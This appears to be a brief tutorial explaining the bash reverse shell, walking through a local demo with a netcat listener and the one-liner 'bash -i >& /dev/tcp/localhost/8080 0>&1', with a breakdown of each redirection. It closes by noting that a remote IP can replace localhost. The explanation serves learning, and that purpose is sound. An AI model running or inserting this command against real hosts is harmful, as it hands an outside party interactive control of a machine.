It’s a(n insecure) remote shell introduced by the target. That’s the opposite of a “normal” remote shell, that is introduced by the source.
Let’s try it with localhost
instead of 10.0.0.1
:
- Open two tabs in your terminal.
- open TCP port 8080 and wait for a connection:nc localhost -lp 8080
- Open an interactive shell, and redirect the IO streams to a TCP socket:bash -i >& /dev/tcp/localhost/8080 0>&1 where
bash -i
“If the -i option is present, the shell is interactive.”>&
“This special syntax redirects both, stdout and stderr to the specified target.”- (argument for
>&
)/dev/tcp/localhost/8080
is a TCP client connection tolocalhost:8080
. 0>&1
redirect file descriptor 0 (stdin) to fd 1 (stdout), hence the opened TCP socket is used to read input.
- Rejoice as you have a prompt in tab 1.
- Now imagine not using
localhost
, but some remote IP.